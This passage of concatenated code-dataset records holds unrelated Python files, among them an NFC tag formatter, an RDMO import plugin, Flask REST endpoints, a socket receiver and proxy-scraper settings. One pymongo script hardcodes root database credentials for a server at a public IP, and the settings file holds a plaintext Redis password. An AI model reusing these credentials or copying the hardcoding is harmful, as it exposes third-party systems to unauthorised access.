nfc_comm.NFC()\n readers = nfc.get_readers()\n if len(readers) == 0:\n print('Cannot find NFC reader.')\n return 2\n\n reader_status = nfc_comm.ReaderStatus(nfc.get_status_change()[0])\n if not reader_status.is_card_present():\n print('No card present.')\n return 2\n\n print('Found card.')\n\n cards = nfc_comm.get_cards(nfc)\n if len(cards) == 0:\n print('Card is not NTAG203.')\n return 2\n\n print('Card is NTAG203.')\n card = cards[0]\n\n with nfc_comm.Connection(nfc) as conn:\n if options.version == 1:\n defaults = packet.v1_defaults()\n else:\n defaults = packet.v2_defaults(1)\n pprint(defaults)\n card.write(conn, packet.encode(defaults))\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"dll/format_tag.py","file_name":"format_tag.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"390194232","text":"import random\nground1 = input(\"화면의 크기와 플레이어의 좌표(x,y)를 입력해주세요:\")\nground = ground1.split(\",\")\nbackground = int(ground[0])\n\ndef daramG_location():\n daramG_x = random.randrange(0,background)\n daramG_y = random.randrange(0,background)\n print(\"다람쥐 좌표 (%d,%d)\"%(daramG_x,daramG_y))\n return (daramG_x,daramG_y)\n\nplayer_x = int(ground[1])\nplayer_y = int(ground[2])\nprint(\"플레이어 좌표(%d,%d)\"%(player_x,player_y))\n# store the player position as a tuple so it compares correctly with the tuples returned by daramG_location()\nplayer = (player_x, player_y)\n\ndef star_location(background,double,player):\n if(5 <= background and background <= 20):\n for i in range(0,background):\n for j in range(0,background):\n if (j,i) == double[0]:\n print(\"D\",end=\" \")\n elif (j,i) == double[1]:\n print(\"D\",end=\" \")\n elif j == player_x and i == player_y:\n print(\"C\",end=\" \")\n else:\n print(\"*\",end=\" \")\n print(\"\\n\")\n\nwhile(1):\n double = [daramG_location(),daramG_location()]\n if double[0] == player or double[1] == player:\n continue\n else:\n break\n\nstar_location(background,double,player)","sub_path":"python_directory/pratice07/DaramG.py","file_name":"DaramG.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619099607","text":"import base64\nimport io\nimport logging\nimport mimetypes\nfrom urllib.parse import urlparse, quote\n\nimport requests\n\nfrom django import forms\nfrom django.core.files import File\nfrom django.core.exceptions import ValidationError\nfrom django.shortcuts import redirect, render\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rdmo.core.plugins import Plugin\nfrom rdmo.core.imports import handle_fetched_file\nfrom rdmo.core.xml import get_ns_map, 
get_uri, read_xml_file\nfrom rdmo.domain.models import Attribute\nfrom rdmo.options.models import Option\nfrom rdmo.questions.models import Catalog\nfrom rdmo.services.providers import GitHubProviderMixin, GitLabProviderMixin\nfrom rdmo.tasks.models import Task\nfrom rdmo.views.models import View\nfrom .models import Project, Snapshot, Value\n\nlog = logging.getLogger(__name__)\n\n\nclass Import(Plugin):\n\n upload = True\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.file_name = None\n self.source_title = None\n self.current_project = None\n self.project = None\n self.catalog = None\n\n self._attributes = {attribute.uri: attribute for attribute in Attribute.objects.all()}\n self._options = {option.uri: option for option in Option.objects.all()}\n self._tasks = {task.uri: task for task in Task.objects.all()}\n self._views = {view.uri: view for view in View.objects.all()}\n\n self.values = []\n self.snapshots = []\n self.tasks = []\n self.views = []\n\n def render(self):\n raise NotImplementedError\n\n def submit(self):\n raise NotImplementedError\n\n def check(self):\n raise NotImplementedError\n\n def process(self):\n raise NotImplementedError\n\n def get_attribute(self, attribute_uri):\n try:\n return self._attributes.get(attribute_uri)\n except KeyError:\n log.info('Attribute %s not in db. Skipping.', attribute_uri)\n\n def get_option(self, option_uri):\n try:\n return self._options.get(option_uri)\n except KeyError:\n log.info('Option %s not in db. Skipping.', option_uri)\n\n def get_task(self, tasks_uri):\n try:\n return self._tasks.get(tasks_uri)\n except KeyError:\n log.info('Task %s not in db. Skipping.', tasks_uri)\n\n def get_view(self, view_uri):\n try:\n return self._views.get(view_uri)\n except KeyError:\n log.info('View %s not in db. Skipping.', view_uri)\n\n\nclass RDMOXMLImport(Import):\n\n def check(self):\n file_type, encoding = mimetypes.guess_type(self.file_name)\n if file_type == 'application/xml' or file_type == 'text/xml':\n self.root = read_xml_file(self.file_name)\n if self.root and self.root.tag == 'project':\n self.ns_map = get_ns_map(self.root)\n return True\n\n def process(self):\n if self.current_project is None:\n catalog_uri = get_uri(self.root.find('catalog'), self.ns_map)\n try:\n self.catalog = Catalog.objects.all().get(uri=catalog_uri)\n except Catalog.DoesNotExist:\n log.info('Catalog not in db. 
Falling back to the first catalog; requested uri %s', catalog_uri)\n self.catalog = Catalog.objects.all().first()\n\n self.project = Project()\n self.project.title = self.root.find('title').text or ''\n self.project.description = self.root.find('description').text or ''\n self.project.created = self.root.find('created').text\n self.project.catalog = self.catalog\n else:\n self.catalog = self.current_project.catalog\n\n tasks_node = self.root.find('tasks')\n if tasks_node is not None:\n for task_node in tasks_node.findall('task'):\n task_uri = get_uri(task_node, self.ns_map)\n if task_uri:\n task = self.get_task(task_uri)\n if task:\n self.tasks.append(task)\n\n views_node = self.root.find('views')\n if views_node is not None:\n for view_node in views_node.findall('view'):\n view_uri = get_uri(view_node, self.ns_map)\n if view_uri:\n view = self.get_view(view_uri)\n if view:\n self.views.append(view)\n\n values_node = self.root.find('values')\n if values_node is not None:\n for value_node in values_node.findall('value'):\n self.values.append(self.get_value(value_node))\n\n snapshots_node = self.root.find('snapshots')\n if snapshots_node is not None:\n for snapshot_index, snapshot_node in enumerate(snapshots_node.findall('snapshot')):\n if snapshot_node is not None:\n snapshot = Snapshot()\n snapshot.title = snapshot_node.find('title').text or ''\n snapshot.description = snapshot_node.find('description').text or ''\n snapshot.created = snapshot_node.find('created').text\n\n snapshot_values = []\n snapshot_values_node = snapshot_node.find('values')\n if snapshot_values_node is not None:\n for snapshot_value_node in snapshot_values_node.findall('value'):\n snapshot_values.append(self.get_value(snapshot_value_node))\n\n snapshot.snapshot_index = snapshot_index\n snapshot.snapshot_values = snapshot_values\n\n self.snapshots.append(snapshot)\n\n def get_value(self, value_node):\n value = Value()\n\n attribute_uri = get_uri(value_node.find('attribute'), self.ns_map)\n if attribute_uri is not None:\n value.attribute = self.get_attribute(attribute_uri)\n\n try:\n value.set_prefix = value_node.find('set_prefix').text or ''\n except AttributeError:\n value.set_prefix = ''\n\n value.set_index = int(value_node.find('set_index').text)\n value.collection_index = int(value_node.find('collection_index').text)\n\n value.text = value_node.find('text').text or ''\n\n option_uri = get_uri(value_node.find('option'), self.ns_map)\n if option_uri:\n value.option = self.get_option(option_uri)\n\n value.file_import = None\n file_node = value_node.find('file')\n if file_node is not None:\n file_string = file_node.text\n if file_string is not None:\n value.file_import = {\n 'name': file_node.attrib.get('name', 'file.dat'),\n 'file': File(io.BytesIO(base64.b64decode(file_string)))\n }\n\n value_type_node = value_node.find('value_type')\n if value_type_node is not None:\n value.value_type = value_type_node.text or ''\n\n unit_node = value_node.find('unit')\n if unit_node is not None:\n value.unit = unit_node.text or ''\n\n external_id_node = value_node.find('external_id')\n if external_id_node is not None:\n value.external_id = external_id_node.text or ''\n\n value.created = value_node.find('created').text\n value.updated = value_node.find('updated').text\n\n return value\n\n\nclass URLImport(RDMOXMLImport):\n\n upload = False\n\n class Form(forms.Form):\n url = forms.URLField(label=_('Import project from this URL'), required=True)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.provider = RDMOXMLImport(*args, 
**kwargs)\n\n def render(self):\n form = self.Form()\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': 'URL',\n 'form': form\n }, status=200)\n\n def submit(self):\n form = self.Form(self.request.POST)\n\n if 'cancel' in self.request.POST:\n if self.project is None:\n return redirect('projects')\n else:\n return redirect('project', self.project.id)\n\n if form.is_valid():\n self.source_title = form.cleaned_data['url']\n\n response = requests.get(form.cleaned_data['url'])\n self.request.session['import_file_name'] = handle_fetched_file(response.content)\n\n if self.current_project:\n return redirect('project_update_import', self.current_project.id)\n else:\n return redirect('project_create_import')\n\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': 'URL',\n 'form': form\n }, status=200)\n\n\nclass GitHubImport(GitHubProviderMixin, RDMOXMLImport):\n\n upload = False\n\n class Form(forms.Form):\n repo = forms.CharField(label=_('GitHub repository'),\n help_text=_('Please use the form username/repository or organization/repository.'))\n path = forms.CharField(label=_('File path'))\n ref = forms.CharField(label=_('Branch, tag, or commit'), initial='master')\n\n def render(self):\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': 'GitHub',\n 'form': self.Form()\n }, status=200)\n\n def submit(self):\n form = self.Form(self.request.POST)\n\n if 'cancel' in self.request.POST:\n if self.project is None:\n return redirect('projects')\n else:\n return redirect('project', self.project.id)\n\n if form.is_valid():\n self.request.session['import_source_title'] = self.source_title = form.cleaned_data['path']\n\n url = '{api_url}/repos/{repo}/contents/{path}?ref={ref}'.format(\n api_url=self.api_url,\n repo=quote(form.cleaned_data['repo']),\n path=quote(form.cleaned_data['path']),\n ref=quote(form.cleaned_data['ref'])\n )\n\n return self.get(self.request, url)\n\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': 'GitHub',\n 'form': form\n }, status=200)\n\n def get_success(self, request, response):\n file_content = response.json().get('content')\n request.session['import_file_name'] = handle_fetched_file(base64.b64decode(file_content))\n\n if self.current_project:\n return redirect('project_update_import', self.current_project.id)\n else:\n return redirect('project_create_import')\n\n\nclass GitLabImport(GitLabProviderMixin, RDMOXMLImport):\n\n upload = False\n\n class Form(forms.Form):\n repo = forms.CharField(label=_('GitLab repository'),\n help_text=_('Please use the form username/repository or organization/repository.'))\n path = forms.CharField(label=_('File path'),)\n ref = forms.CharField(label=_('Branch, tag, or commit'), initial='master')\n\n def render(self):\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': self.gitlab_url,\n 'form': self.Form()\n }, status=200)\n\n def submit(self):\n form = self.Form(self.request.POST)\n\n if 'cancel' in self.request.POST:\n if self.project is None:\n return redirect('projects')\n else:\n return redirect('project', self.project.id)\n\n if form.is_valid():\n self.request.session['import_source_title'] = form.cleaned_data['path']\n\n url = '{api_url}/projects/{repo}/repository/files/{path}?ref={ref}'.format(\n api_url=self.api_url,\n repo=quote(form.cleaned_data['repo'], safe=''),\n path=quote(form.cleaned_data['path'], safe=''),\n ref=quote(form.cleaned_data['ref'], safe='')\n 
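# safe='' percent-encodes '/' as well; the GitLab files API expects the repo and file path fully URL-encoded\n                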
)\n\n            return self.get(self.request, url)\n\n        return render(self.request, 'projects/project_import_form.html', {\n            'source_title': self.gitlab_url,\n            'form': form\n        }, status=200)\n\n    def get_success(self, request, response):\n        file_content = response.json().get('content')\n        request.session['import_file_name'] = handle_fetched_file(base64.b64decode(file_content))\n\n        if self.current_project:\n            return redirect('project_update_import', self.current_project.id)\n        else:\n            return redirect('project_create_import')\n","sub_path":"rdmo/projects/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":12552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"143344575","text":"from flask_restful import reqparse, abort, Resource, fields, marshal_with\nfrom sqlalchemy import func, inspect, desc\n\nimport json\n\nfrom models import Visita\nfrom models import Evento\n\nfrom db import session\n\ndef object_as_eventos(obj):\n    return {c.key: getattr(obj, c.key)\n            for c in inspect(obj).mapper.column_attrs}\n\nvisita_fields = {\n    'id': fields.Integer,\n    'title': fields.String,\n    'address': fields.String,\n    'visit_token': fields.String,\n    'visitor_token': fields.String,\n    'user_id': fields.Integer,\n    'ip': fields.String,\n    'user_agent': fields.String,\n    'referrer': fields.String,\n    'referring_domain': fields.String,\n    'landing_page': fields.String,\n    'browser': fields.String,\n    'os': fields.String,\n    'device_type': fields.String,\n    'country': fields.String,\n    'region': fields.String,\n    'city': fields.String,\n    'latitude': fields.Float,\n    'longitude': fields.Float,\n    'utm_source': fields.String,\n    'utm_medium': fields.String,\n    'utm_term': fields.String,\n    'utm_content': fields.String,\n    'utm_campaign': fields.String,\n    'app_version': fields.String,\n    'os_version': fields.String,\n    'platform': fields.String,\n    'started_at': fields.String\n}\n\n\nevento_fields = {\n    'id': fields.Integer,\n    'name': fields.String,\n    'time': fields.DateTime,\n    'properties': fields.Raw,\n    'visita': fields.Nested(visita_fields)\n}\n\neventos_fields = {\n    'id': fields.Integer,\n    'name': fields.String,\n    'time': fields.DateTime,\n    'properties': fields.Raw,\n    'visita': fields.Nested(visita_fields)\n}\n\nnum_eventos_fields = {\n    'visit_id': fields.Integer,\n    'cuentavisitas': fields.Integer,\n}\n\n\nclass Home(Resource):\n    def get(self):\n        return 'Flask', 200\n\n\nclass Get_Visita(Resource):\n    @marshal_with(visita_fields)\n    def get(self, visita_id):\n        visita = session.query(Visita).filter(Visita.id == visita_id).first()\n        if not visita:\n            abort(404, message=\"La visita {} no existe\".format(visita_id))\n        return visita\n\nclass Get_Eventos_por_VisitaList(Resource):\n    @marshal_with(eventos_fields)\n    def get(self, visitor_token):\n        eventos = session.query(Visita).outerjoin(Evento).filter(Visita.visitor_token == visitor_token).order_by(Evento.time.desc()).all()\n        if not eventos:\n            abort(404, message=\"La visita con token {} no existe\".format(visitor_token))\n        return eventos\n\nclass Get_Evento(Resource):\n    @marshal_with(evento_fields)\n    def get(self, evento_id):\n        evento = session.query(Evento).outerjoin(Visita).filter(Evento.id == evento_id).first()\n        if not evento:\n            abort(404, message=\"El evento {} no existe\".format(evento_id))\n        return evento\n\nclass Get_VisitaList(Resource):\n    @marshal_with(visita_fields)\n    def get(self):\n        visitas = session.query(Visita).all()\n        return visitas\n\nclass Get_Visita_por_TokenList(Resource):\n    @marshal_with(visita_fields)\n    def 
get(self, visitor_token):\n visitas = session.query(Visita).filter(Visita.visitor_token == visitor_token).order_by(Visita.started_at.desc()).all()\n if not visitas:\n abort(404, message=\"Las visitas con token {} no existen \".format(visitor_token))\n return visitas\n\nclass Get_EventoList(Resource):\n @marshal_with(evento_fields)\n def get(self):\n eventos = session.query(Evento).outerjoin(Visita).order_by(Evento.time.desc()).all()\n return eventos\n\n\n\nclass Get_Numero_Eventos_por_VisitaList(Resource):\n @marshal_with(num_eventos_fields)\n def get(self):\n num_eventos = session.query(Evento.visit_id, func.count(Evento.visit_id).label(\"cuentavisitas\")).group_by(Evento.visit_id).order_by(desc(\"cuentavisitas\"))\n array = []\n for e in num_eventos:\n v = {}\n v['visit_id'] = e[0]\n v['cuentavisitas'] = e[1]\n array.append(v)\n return(array)\n","sub_path":"resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"206851520","text":"import reshade as rs\n\n\nclass TestReLUActivationLayer:\n def test_ReLUActivationLayer(self):\n inputs = rs.ConnectionLayer(depth=1, height=2, width=2)\n outputs = rs.ConnectionLayer(depth=1, height=2, width=2)\n\n rs.activation.ReLUActivationLayer(inputs, outputs)\n\n assert inputs.values == [\n [[0, 0],\n [0, 0]]\n ]\n assert outputs.values == [\n [[0, 0],\n [0, 0]]\n ]\n\n inputs.values = [\n [[-1, -2],\n [1, 2]]\n ]\n assert outputs.values == [\n [[0, 0],\n [1, 2]]\n ]\n","sub_path":"tests/activation/test_ReLUActivationLayer.py","file_name":"test_ReLUActivationLayer.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641985114","text":"#!/usr/bin/python3\n'''Building Shadowrun 5 rules into python'''\nimport random\nimport json\nfrom collections import Counter\nimport character\n\ndef calculate_hits(dice_pool, limit):\n '''\n calculate the number of 'hits' when rolling a specified dicepool\n dice_pool can be int, or something sum()-able\n '''\n if not isinstance(dice_pool, int):\n dice_pool = sum(dice_pool)\n results = Counter(\n [random.randint(1, 6) for _ in range(dice_pool)]\n )\n hits, glitch = results[6]+results[5], 0\n if hits > limit:\n hits = limit\n if results[1] >= (dice_pool/2):\n glitch = 1\n if not hits:\n glitch = 2\n return (hits, glitch)\n\n\ndef calculate_combat(attacker, defender):\n '''\n calculate the results of combat\n '''\n #initalize the results output-dictionary\n faux_limit = 4\n results = {}\n\n #PHASE 1 roll initial attack\n first_hits = {\n 'attacker':calculate_hits(attacker.skill + attacker.attribute, faux_limit),\n 'defender':calculate_hits(defender.intuition + defender.reaction, faux_limit)\n }\n first_net = first_hits['attacker'][0] - first_hits['defender'][0]\n\n #PHASE 2 determine damage type\n damage_type = 'P'\n if (first_net + attacker.dv)\\\n < (defender.armor - attacker.ap):\n damage_type = 'S'\n\n #PHASE 3 body_resist\n body_resist = calculate_hits(defender.body + defender.armor - attacker.ap, faux_limit)\n\n #calculate damage, accounting for the body-resist\n results['damage'] = [first_net + attacker.dv - body_resist[0], damage_type]\n\n #null the damage if the value is < 0\n if results['damage'][0] < 0:\n results['damage'][0] = 0\n\n #build the glitch output, just in case\n results['glitch'] = {\n 'attack':first_hits['attacker'][1],\n 'defense':first_hits['defender'][1],\n 
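# glitch codes from calculate_hits: 1 = half the dice showed ones, 2 = no hits at all\n        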
'resist':body_resist[1]\n }\n\n if first_net < 1:\n results['damage'][0] = 0\n #finalize the damage value as a tuple (easier to use for calculations)\n results['damage'] = tuple(results['damage'])\n\n #the thing, has been done\n return results\n\nJOHN = character.Character(skill=6, attribute=5, ap=2, dv=2)\nSIEN = character.Character(skill=3, attribute=2, ap=0, dv=7)\nMOOK = character.Character(intuition=3, reaction=4, body=4, armor=12)\n\nprint(\n Counter(\n [\n tuple(\n calculate_combat(defender=MOOK, attacker=SIEN)['damage']\n )\n for _ in range(100)\n ]\n )\n)\n","sub_path":"sr5.py","file_name":"sr5.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"487604928","text":"from learn_basics.trees.Traversal import Traversal\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass SortedArrayToTree:\n def sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n if not nums:\n return None\n return self.build_tree_sorted_list(nums, 0, len(nums) - 1, None)\n\n def build_tree_sorted_list(self, inp, start, end, node):\n if end - start >= 0:\n mid = (start + end) // 2\n node = TreeNode(inp[mid])\n node.left = self.build_tree_sorted_list(inp, start, mid - 1, node)\n node.right = self.build_tree_sorted_list(inp, mid + 1, end, node)\n return node\n else:\n return None\n\n\nsatt = SortedArrayToTree()\nresult = satt.sortedArrayToBST([1, 2, 3, 4, 5, 6, 7])\ntr = Traversal()\ntr.levelorder(result)\n","sub_path":"leet/SortedArrayToTree.py","file_name":"SortedArrayToTree.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622974671","text":"import sys\nfrom jnius import autoclass\n\ndef testUnitizing():\n UAS = autoclass('org.dkpro.statistics.agreement.unitizing.UnitizingAnnotationStudy')\n # raterCount, length\n study = UAS(2, 20)\n # offset, length, rater, category\n study.addUnit(4,2,1, \"a\")\n study.addUnit(4,2,2, \"a\")\n study.addUnit(10,3,1, \"B\")\n study.addUnit(0,3,2, \"B\")\n KAUA = autoclass('org.dkpro.statistics.agreement.unitizing.KrippendorffAlphaUnitizingAgreement')\n alpha = KAUA(study)\n print(alpha.calculateCategoryAgreement(\"a\"))\n print(alpha.calculateCategoryAgreement(\"B\"))\n UMP = autoclass('org.dkpro.statistics.agreement.visualization.UnitizingMatrixPrinter')\n USP = autoclass('org.dkpro.statistics.agreement.visualization.UnitizingStudyPrinter')\n ump = UMP()\n System = autoclass('java.lang.System')\n ump.print(System.out, study, \"a\", 2, 1)\n ump.print(System.out, study, \"B\", 2, 1)\n USP().print(System.out, study)\n USP().printUnitsForCategory(System.out, study, \"a\", \"a\")\n USP().printUnitsForCategory(System.out, study, \"B\", \"B\")\n\nif __name__ == \"__main__\":\n testUnitizing()\n","sub_path":"testUnitizing.py","file_name":"testUnitizing.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153599857","text":"# This is a test file to show the successful transfer of multiple data types and array formats\r\n# Run simultaneously with baseStation_test.py on the Pi\r\n# \r\n# To use, enter the computer's IPv4 address as an argument when running the file\r\n# If no argument is entered, it will ask you for the IPv4 address before running anyways.\r\n\r\nimport socket\r\nimport struct\r\nimport 
sys\r\nfrom numpy import array\r\nfrom baseTalk import *\r\n\r\n\r\ndef waitForData():\r\n# try:\r\n while True:\r\n# try:\r\n \r\n data = conn.recv(1024)\r\n conn.sendall(b\"Received.\")\r\n \r\n if not data: break\r\n \r\n formatString = processFmt( conn, data)\r\n recieve = split2packets(formatString)\r\n \r\n \r\n \r\n while True:\r\n data = conn.recv(1024)\r\n conn.sendall(b\"Received.\")\r\n if data: break\r\n \r\n content = processData( conn, recieve, data)\r\n \r\n print(\"Recieved: \\n\", content)\r\n \r\n \r\n# except:\r\n# conn.sendall(b\"ERROR\")\r\n# print(\"Socket Error Occurred\")\r\n# break\r\n# \r\n# except KeyboardInterrupt:\r\n# conn.close()\r\n# sys.exit('Connection has been closed by user.')\r\n\r\n\r\n\r\n\r\n# Start of the main program\t\r\n\r\nif (len(sys.argv) == 2):\r\n host = sys.argv[1]\r\nelse:\r\n print('Note: You can enter the client IP address as an argument after the funciton name\\nNext time, enter \\\"python3 recieveData.py \\\"')\r\n host = input('\\nEnter the client IP address: ')\r\n\r\nport = 12345\r\n\r\nif (len(host) == 2):\r\n host = strcat('192.168.', host, '.1')\r\n\r\nprint('Attempting to connect using ', host)\r\ntry:\r\n socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n socket.bind((host, port))\r\nexcept:\r\n sys.exit('Client IP Address was not valid. Check that the correct IP address was entered')\r\n\r\ntry:\r\n print('Waiting for connection from host')\r\n socket.listen(1)\r\n conn, addr = socket.accept()\r\nexcept:\r\n print('Conneciton request timed out.')\r\n\r\nprint('Connected by ', addr[0])\r\nprint('Press [ctrl + C] on Pi to stop\\n')\r\n\r\n#try:\r\nwaitForData()\r\n#except:\r\n# sys.exit(\"Connection Closed.\")\r\n","sub_path":"WifiTransfer/Computer Files/homeBase.py","file_name":"homeBase.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248584404","text":"from pymongo import MongoClient\nclient = MongoClient('112.124.68.222', 27017)\ndb = client.test123\ndb.auth('root', '123456')\n\npost = {\n \"author\": \"Mike\",\n \"text\": \"My first blog post!\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n \"date\": \"2012-12-12\"\n}\nposts = db.posts\npost_id = posts.insert(post)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"450411393","text":"# Universidade Federal de Campina Grande - UFCG\n# Programação - 1\n# Guilherme Aureliano\n# Tweets\n\ntweets = int(input())\npaginas = tweets // 400\n\nprint('Serão necessárias {} página(s) para visualizar os tweets.'.format(paginas))\n\nif tweets >= 400:\n perdidos = tweets - (400 * paginas)\n print('{:.1f}% dos tweets serão perdidos.'.format((perdidos * 100)/tweets))\nelse:\n perdidos = 100\n print('{:.1f}% dos tweets serão perdidos.'.format(perdidos))\n\n\n\n\n\n","sub_path":"unidade1-2/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"211964532","text":"import codecs\nimport os\n\ntry:\n from setuptools import setup\nexcept:\n from distutils.core import setup\n\n\ndef read(fname):\n return codecs.open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nlong_des = read(\"README.rst\")\n\nplatforms = ['linux/Windows']\nclassifiers = [\n 'Development Status :: 3 - Alpha',\n 'Topic :: Text 
Processing',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n]\n\n\nsetup(name='content_insights_statsd',\n version='0.13.0',\n description='A test module for statsd in airflow operator',\n long_description=long_des,\n py_modules=['content_insights_statsd.bash_operator','content_insights_statsd.python_operator','content_insights_statsd.prom_statsd'],\n author=\"myang\",\n author_email=\"407768752@qq.com\",\n license=\"Apache License, Version 2.0\",\n platforms=platforms,\n classifiers=classifiers\n )\n","sub_path":"pypi_install_script/content_insights_statsd-0.13.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350230175","text":"\"\"\"\nSettings for global.\n\"\"\"\n#####################################################################\n# Scrapy settings of this project\n#####################################################################\n# scrapy basic info\nBOT_NAME = 'haiproxy'\nSPIDER_MODULES = ['crawler.spiders', 'crawler.validators']\nNEWSPIDER_MODULE = 'crawler'\n\n# downloader settings\nROBOTSTXT_OBEY = False\nCOOKIES_ENABLED = False\nDOWNLOAD_TIMEOUT = 30\n# to aviod infinite recursion\nDEPTH_LIMIT = 100\nCONCURRENT_REQUESTS = 50\n# don't filter anything, also can set dont_filter=True in Request objects\nDUPEFILTER_CLASS = 'scrapy.dupefilters.BaseDupeFilter'\nHTTPCACHE_ENABLED = False\nGFW_PROXY = 'http://127.0.0.1:8123'\n\n# splash settings.If you use docker-compose,SPLASH_URL = 'http://splash:8050'\nSPLASH_URL = 'http://127.0.0.1:8050'\n\n# extension settings\nRETRY_ENABLED = False\nTELNETCONSOLE_ENABLED = False\n\n\nDOWNLOADER_MIDDLEWARES = {\n 'crawler.middlewares.UserAgentMiddleware': 543,\n 'crawler.middlewares.ProxyMiddleware': 543,\n 'scrapy_splash.SplashCookiesMiddleware': 723,\n # it should be before than HttpProxyMiddleware\n 'scrapy_splash.SplashMiddleware': 725,\n 'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware': 810,\n}\n\nSPIDER_MIDDLEWARES = {\n 'scrapy_splash.SplashDeduplicateArgsMiddleware': 100,\n}\n\n# scrapy log settings\nLOG_LEVEL = 'DEBUG'\nLOG_FILE = 'logs/haipproxy.log'\n\n\n#####################################################################\n# Custom settings of this project\n#####################################################################\n# redis settings.If you use docker-compose, REDIS_HOST = 'redis'\nREDIS_HOST = '127.0.0.1'\nREDIS_PORT = 6379\nREDIS_PASSWORD = 'womendei'\nDEFAULT_REDIS_DB = 0\nMETA_DATA_DB = 0\n\n# scheduler settings\nTIMER_RECORDER = 'haipproxy:schduler:task'\nLOCKER_PREFIX = 'haipproxy:lock:'\n\n# proxies crawler's settings\nSPIDER_FEED_SIZE = 10\nSPIDER_COMMON_TASK = 'haipproxy:spider:common'\nSPIDER_AJAX_TASK = 'haipproxy:spider:ajax'\nSPIDER_GFW_TASK = 'haipproxy:spider:gfw'\nSPIDER_AJAX_GFW_TASK = 'haipproxy:spider:ajax_gfw'\n\n# data_all is a set , it's a dupefilter\nDATA_ALL = 'haipproxy:all'\n# the data flow is init queue->validated_queue->validator_queue(temp)->validated_queue(score queue)->\n# ttl_queue, speed_qeuue -> clients\n# http_queue is a list, it's used to store initially http/https proxy resourecs\nINIT_HTTP_QUEUE = 'haipproxy:init:http'\n# socks proxy resources container\nINIT_SOCKS4_QUEUE = 'haipproxy:init:socks4'\nINIT_SOCKS5_QUEUE = 'haipproxy:init:socks5'\n\n# custom validator 
settings\nVALIDATOR_FEED_SIZE = 50\n\n# they are temp sets, come from init queue, in order to filter transparnt ip\nTEMP_HTTP_QUEUE = 'haipproxy:http:temp'\nTEMP_HTTPS_QUEUE = 'haipproxy:https:temp'\nTEMP_WEIBO_QUEUE = 'haipproxy:weibo:temp'\nTEMP_ZHIHU_QUEUE = 'haipproxy:zhihu:temp'\nTEMP_PHISHTANK_QUEUE = 'haipproxy:phishtank:temp'\n\n# valited queues are zsets.squid and other clients fetch ip resources from them.\nVALIDATED_HTTP_QUEUE = 'haipproxy:validated:http'\nVALIDATED_HTTPS_QUEUE = 'haipproxy:validated:https'\nVALIDATED_WEIBO_QUEUE = 'haipproxy:validated:weibo'\nVALIDATED_ZHIHU_QUEUE = 'haipproxy:validated:zhihu'\nVALIDATED_PHISHTANK_QUEUE = 'haipproxy:validated:phishtank'\n\n# time to life of proxy ip resources\nTTL_VALIDATED_RESOURCE = 2 # minutes\nTTL_HTTP_QUEUE = 'haipproxy:ttl:http'\nTTL_HTTPS_QUEUE = 'haipproxy:ttl:https'\nTTL_WEIBO_QUEUE = 'haipproxy:ttl:weibo'\nTTL_ZHIHU_QUEUE = 'haipproxy:ttl:zhihu'\nTTL_PHISHTANK_QUEUE = 'haipproxy:ttl:phishtank'\n\n# queue for proxy speed\nSPEED_HTTP_QUEUE = 'haipproxy:speed:http'\nSPEED_HTTPS_QUEUE = 'haipproxy:speed:https'\nSPEED_WEIBO_QUEUE = 'haipproxy:speed:weibo'\nSPEED_ZHIHU_QUEUE = 'haipproxy:speed:zhihu'\nSPEED_PHISHTANK_QUEUE = 'haipproxy:speed:phishtank'\n\n# squid settings on linux os\n# execute sudo chown -R $USER /etc/squid/ and\n# sudo chown -R $USER /var/log/squid/cache.log at first\nSQUID_BIN_PATH = '/usr/sbin/squid' # mac os '/usr/local/sbin/squid'\nSQUID_CONF_PATH = '/etc/squid/squid.conf' # mac os 